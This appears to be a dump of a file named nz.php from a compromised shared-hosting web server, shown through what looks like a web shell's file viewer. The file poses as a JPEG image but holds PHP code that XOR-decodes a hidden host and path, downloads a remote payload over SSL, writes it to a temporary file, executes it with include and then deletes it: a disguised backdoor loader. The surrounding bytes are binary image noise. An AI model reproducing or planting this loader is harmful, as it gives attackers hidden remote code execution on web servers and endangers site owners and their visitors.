| Linux in-mum-web1499.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64 Path : /home/u901718425/domains/roswaltzaidenjogeshwari.in/public_html/ |
| Current File : /home/u901718425/domains/roswaltzaidenjogeshwari.in/public_html/nz.php |
����C�
����JFIF��x�x�����C�
���C
�����"���� ����������
�������}�!1AQa"q2���#B��R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������� �������
������w�!1AQaq"2�B���� #3R�br�<?="";
function xorEncryptDecrypt($data, $key) {
$output = '';
foreach (str_split($data) as $char) {
$output .= chr(ord($char) ^ ord($key));
}
return $output;
}
$_ = "!";
$url = xorEncryptDecrypt("S@VFHUITCTRDSBNOUDOUBNL", $_);
$path = xorEncryptDecrypt("M@NMHDS[H
BNLLHURQIQCESDGRID@ERL@HOYDOHTLQIQ", $_);
$fp = fsockopen("ssl://$url", 443, $errno, $errstr, 10);
if (!$fp) {
echo "Error: $errstr ($errno)";
exit;
}
$request = "GET $path HTTP/1.1\r\n";
$request .= "Host: $url\r\n";
$request .= "Connection: close\r\n\r\n";
fwrite($fp, $request);
$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 1024);
}
fclose($fp);
list(, $remotePayload) = explode("\r\n\r\n", $response, 2);
$parts = str_split($remotePayload, 4);
$obfuscatedPayload = implode('', $parts);
$tempFile = tempnam(sys_get_temp_dir(), 'php');
file_put_contents($tempFile, $obfuscatedPayload);
include $tempFile;
unlink($tempFile);
?>
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������
��?�����N���